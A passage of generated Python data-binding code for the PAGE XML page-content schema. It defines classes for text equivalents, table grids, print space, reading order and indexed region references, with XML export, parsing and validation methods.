            # No-op normalization kept from the code generator.
            value = value
            enumerations = ['xsd:decimal', 'xsd:float', 'xsd:integer', 'xsd:boolean', 'xsd:date', 'xsd:time', 'xsd:dateTime', 'xsd:string', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextDataTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
    def hasContent_(self):
        """Return True when either text child (PlainText/Unicode) is set."""
        if (
            self.PlainText is not None or
            self.Unicode is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='TextEquivType', pretty_print=True):
        """Serialize this element as XML to ``outfile`` at indent ``level``."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextEquivType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'TextEquivType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextEquivType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextEquivType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextEquivType'):
        """Write this element's XML attributes; ``already_processed`` guards duplicates."""
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.conf is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
        if self.dataType is not None and 'dataType' not in already_processed:
            already_processed.add('dataType')
            outfile.write(' dataType=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.dataType), input_name='dataType')), ))
        if self.dataTypeDetails is not None and 'dataTypeDetails' not in already_processed:
            already_processed.add('dataTypeDetails')
            outfile.write(' dataTypeDetails=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.dataTypeDetails), input_name='dataTypeDetails')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='TextEquivType', fromsubclass_=False, pretty_print=True):
        """Write the PlainText and Unicode text children, XML-escaped."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.PlainText is not None:
            namespaceprefix_ = self.PlainText_nsprefix_ + ':' if (UseCapturedNS_ and self.PlainText_nsprefix_) else ''
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sPlainText>%s</%sPlainText>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.PlainText), input_name='PlainText')), namespaceprefix_ , eol_))
        if self.Unicode is not None:
            namespaceprefix_ = self.Unicode_nsprefix_ + ':' if (UseCapturedNS_ and self.Unicode_nsprefix_) else ''
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sUnicode>%s</%sUnicode>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Unicode), input_name='Unicode')), namespaceprefix_ , eol_))
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree ``node``; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read XML attributes from ``node``, validating simple types."""
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
            self.validate_indexType(self.index) # validate type indexType
        value = find_attr_value_('conf', node)
        if value is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            value = self.gds_parse_float(value, node, 'conf')
            self.conf = value
            self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
        value = find_attr_value_('dataType', node)
        if value is not None and 'dataType' not in already_processed:
            already_processed.add('dataType')
            self.dataType = value
            self.validate_TextDataTypeSimpleType(self.dataType) # validate type TextDataTypeSimpleType
        value = find_attr_value_('dataTypeDetails', node)
        if value is not None and 'dataTypeDetails' not in already_processed:
            already_processed.add('dataTypeDetails')
            self.dataTypeDetails = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Build the PlainText/Unicode text children from parsed nodes."""
        if nodeName_ == 'PlainText':
            value_ = child_.text
            value_ = self.gds_parse_string(value_, node, 'PlainText')
            value_ = self.gds_validate_string(value_, node, 'PlainText')
            self.PlainText = value_
            self.PlainText_nsprefix_ = child_.prefix
        elif nodeName_ == 'Unicode':
            value_ = child_.text
            value_ = self.gds_parse_string(value_, node, 'Unicode')
            value_ = self.gds_validate_string(value_, node, 'Unicode')
            self.Unicode = value_
            self.Unicode_nsprefix_ = child_.prefix
# end class TextEquivType
class GridType(GeneratedsSuper):
    """Matrix of grid points defining the table grid on the page.

    Holds a list of GridPointsType rows (schema requires at least 2).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('GridPoints', 'GridPointsType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '2', 'name': 'GridPoints', 'type': 'GridPointsType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, GridPoints=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Avoid sharing a mutable default: create a fresh list when absent.
        if GridPoints is None:
            self.GridPoints = []
        else:
            self.GridPoints = GridPoints
        self.GridPoints_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GridType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GridType.subclass:
            return GridType.subclass(*args_, **kwargs_)
        else:
            return GridType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_GridPoints(self):
        return self.GridPoints
    def set_GridPoints(self, GridPoints):
        self.GridPoints = GridPoints
    def add_GridPoints(self, value):
        self.GridPoints.append(value)
    def insert_GridPoints_at(self, index, value):
        self.GridPoints.insert(index, value)
    def replace_GridPoints_at(self, index, value):
        self.GridPoints[index] = value
    def hasContent_(self):
        """Return True when at least one GridPoints row is present."""
        if (
            self.GridPoints
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridType', pretty_print=True):
        """Serialize this element as XML to ``outfile`` at indent ``level``."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GridType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'GridType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GridType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GridType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GridType'):
        # GridType defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridType', fromsubclass_=False, pretty_print=True):
        """Write each GridPoints row as a child element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for GridPoints_ in self.GridPoints:
            namespaceprefix_ = self.GridPoints_nsprefix_ + ':' if (UseCapturedNS_ and self.GridPoints_nsprefix_) else ''
            GridPoints_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GridPoints', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree ``node``; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # GridType defines no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Append each parsed GridPoints child row."""
        if nodeName_ == 'GridPoints':
            obj_ = GridPointsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.GridPoints.append(obj_)
            obj_.original_tagname_ = 'GridPoints'
# end class GridType
class GridPointsType(GeneratedsSuper):
    """One row of a table grid: points with x,y coordinates.

    ``index`` is the grid row index; ``points`` is a space-separated
    "x,y" coordinate string (pc:PointsType).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('points', 'pc:PointsType', 0, 0, {'use': 'required'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, index=None, points=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        self.points = _cast(None, points)
        self.points_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GridPointsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GridPointsType.subclass:
            return GridPointsType.subclass(*args_, **kwargs_)
        else:
            return GridPointsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_points(self):
        return self.points
    def set_points(self, points):
        self.points = points
    def validate_PointsType(self, value):
        # Validate type pc:PointsType, a restriction on string.
        # Pattern requires one or more "x,y" pairs separated by spaces.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            if not self.gds_validate_simple_patterns(
                    self.validate_PointsType_patterns_, value):
                self.gds_collector_.add_message('Value "%s" does not match xsd pattern restrictions: %s' % (encode_str_2_3(value), self.validate_PointsType_patterns_, ))
    validate_PointsType_patterns_ = [['^(([0-9]+,[0-9]+ )+([0-9]+,[0-9]+))$']]
    def hasContent_(self):
        # The empty parentheses below are an empty tuple, which is falsy,
        # so this always returns False: GridPointsType carries attributes
        # only and has no child elements.
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridPointsType', pretty_print=True):
        """Serialize this element as XML to ``outfile`` at indent ``level``."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GridPointsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'GridPointsType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GridPointsType')
        # NOTE(review): hasContent_ always returns False here (see above),
        # so only the self-closing branch is ever taken.
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GridPointsType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GridPointsType'):
        """Write the required ``index`` and ``points`` attributes."""
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.points is not None and 'points' not in already_processed:
            already_processed.add('points')
            outfile.write(' points=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.points), input_name='points')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GridPointsType', fromsubclass_=False, pretty_print=True):
        # No child elements to export.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree ``node``; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the ``index`` and ``points`` attributes, validating points."""
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
        value = find_attr_value_('points', node)
        if value is not None and 'points' not in already_processed:
            already_processed.add('points')
            self.points = value
            self.validate_PointsType(self.points) # validate type PointsType
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements to build.
        pass
# end class GridPointsType
class PrintSpaceType(GeneratedsSuper):
    """Determines the effective area on the paper of a printed page.
    Its size is equal for all pages of a book
    (exceptions: titlepage, multipage pictures).
    It contains all living elements (except marginals)
    like body type, footnotes, headings, running titles.
    It does not contain pagenumber (if not part of running title),
    marginals, signature mark, preview words."""
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, Coords=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.Coords = Coords
        self.Coords_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, PrintSpaceType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if PrintSpaceType.subclass:
            return PrintSpaceType.subclass(*args_, **kwargs_)
        else:
            return PrintSpaceType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Coords(self):
        return self.Coords
    def set_Coords(self, Coords):
        self.Coords = Coords
    def hasContent_(self):
        """Return True when the Coords child is set."""
        if (
            self.Coords is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PrintSpaceType', pretty_print=True):
        """Serialize this element as XML to ``outfile`` at indent ``level``."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('PrintSpaceType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'PrintSpaceType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PrintSpaceType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PrintSpaceType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PrintSpaceType'):
        # PrintSpaceType defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PrintSpaceType', fromsubclass_=False, pretty_print=True):
        """Write the Coords child element if present."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.Coords is not None:
            namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
            self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree ``node``; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # PrintSpaceType defines no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Build the Coords child from a parsed node."""
        if nodeName_ == 'Coords':
            obj_ = CoordsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Coords = obj_
            obj_.original_tagname_ = 'Coords'
    def get_polygon(self):
        '''
        Get polygon from element which is parent of a Coords element
        '''
        points = [point for point in self.Coords.points.split(' ')]
        return [[int(coord) for coord in point.split(',')] for point in points]
    def get_polygon_string(self):
        '''
        Get polygon string from element which is parent of a Coords element
        '''
        # NOTE(review): flattens "x1,y1 x2,y2" into "x1,y1,x2,y2" — confirm
        # this is the format callers expect.
        return self.Coords.points.replace(' ', ',')
# end class PrintSpaceType
class ReadingOrderType(GeneratedsSuper):
    """Definition of the reading order within the page.
    To express a reading order between elements
    they have to be included in an OrderedGroup.
    Groups may contain further groups.
    Confidence value (between 0 and 1)"""
    __hash__ = GeneratedsSuper.__hash__
    # Generated member metadata: one MemberSpec_ per XML attribute/element.
    member_data_items_ = [
        MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('OrderedGroup', 'OrderedGroupType', 0, 0, {'name': 'OrderedGroup', 'type': 'OrderedGroupType'}, 2),
        MemberSpec_('UnorderedGroup', 'UnorderedGroupType', 0, 0, {'name': 'UnorderedGroup', 'type': 'UnorderedGroupType'}, 2),
    ]
    subclass = None
    superclass = None
    def __init__(self, conf=None, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
        """Initialize with an optional confidence and exactly one of the
        two (mutually exclusive per schema choice group) root groups."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.conf = _cast(float, conf)
        self.conf_nsprefix_ = None
        self.OrderedGroup = OrderedGroup
        self.OrderedGroup_nsprefix_ = "pc"
        self.UnorderedGroup = UnorderedGroup
        self.UnorderedGroup_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, honoring an externally registered subclass
        module if one is active."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ReadingOrderType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ReadingOrderType.subclass:
            return ReadingOrderType.subclass(*args_, **kwargs_)
        else:
            return ReadingOrderType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_OrderedGroup(self):
        return self.OrderedGroup
    def set_OrderedGroup(self, OrderedGroup):
        self.OrderedGroup = OrderedGroup
    def get_UnorderedGroup(self):
        return self.UnorderedGroup
    def set_UnorderedGroup(self, UnorderedGroup):
        self.UnorderedGroup = UnorderedGroup
    def get_conf(self):
        return self.conf
    def set_conf(self, conf):
        self.conf = conf
    def validate_ConfSimpleType(self, value):
        # Validate type pc:ConfSimpleType, a restriction on float.
        # Reports range violations (conf must be within [0, 1]) through the
        # message collector rather than raising.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, float):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
                # NOTE(review): `result` is assigned but never returned;
                # quirk of the generated code, kept for fidelity.
                result = False
            if value > 1:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
                result = False
    def hasContent_(self):
        # True when the element has children and must be serialized with a
        # separate closing tag.
        if (
            self.OrderedGroup is not None or
            self.UnorderedGroup is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ReadingOrderType', pretty_print=True):
        """Serialize this element (attributes plus children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReadingOrderType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'ReadingOrderType':
            # Round-trip under the tag name the element was parsed with.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ReadingOrderType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ReadingOrderType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ReadingOrderType'):
        # Only the optional confidence attribute exists on this type.
        if self.conf is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ReadingOrderType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.OrderedGroup is not None:
            namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
            self.OrderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
        if self.UnorderedGroup is not None:
            namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
            self.UnorderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from the parsed XML *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse and range-check the optional confidence attribute.
        value = find_attr_value_('conf', node)
        if value is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            value = self.gds_parse_float(value, node, 'conf')
            self.conf = value
            self.validate_ConfSimpleType(self.conf)    # validate type ConfSimpleType
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse one child element (OrderedGroup or UnorderedGroup)."""
        if nodeName_ == 'OrderedGroup':
            obj_ = OrderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.OrderedGroup = obj_
            obj_.original_tagname_ = 'OrderedGroup'
        elif nodeName_ == 'UnorderedGroup':
            obj_ = UnorderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UnorderedGroup = obj_
            obj_.original_tagname_ = 'UnorderedGroup'
# end class ReadingOrderType
class RegionRefIndexedType(GeneratedsSuper):
    """Numbered regionPosition (order number) of this item within the current
    hierarchy level."""
    __hash__ = GeneratedsSuper.__hash__
    # Generated member metadata: one MemberSpec_ per XML attribute/element.
    member_data_items_ = [
        MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
        MemberSpec_('regionRef', 'string', 0, 0, {'use': 'required'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, index=None, regionRef=None, gds_collector_=None, **kwargs_):
        """Initialize with the required position index and the id of the
        referenced region."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honoring an externally registered subclass
        module if one is active."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, RegionRefIndexedType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if RegionRefIndexedType.subclass:
            return RegionRefIndexedType.subclass(*args_, **kwargs_)
        else:
            return RegionRefIndexedType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def hasContent_(self):
        # This type carries attributes only; the empty condition below is
        # the generator's way of saying "never has element content".
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefIndexedType', pretty_print=True):
        """Serialize this element to *outfile* (always self-closing, since
        hasContent_() is always False for this type)."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionRefIndexedType')
        if imported_ns_def_ is not None:
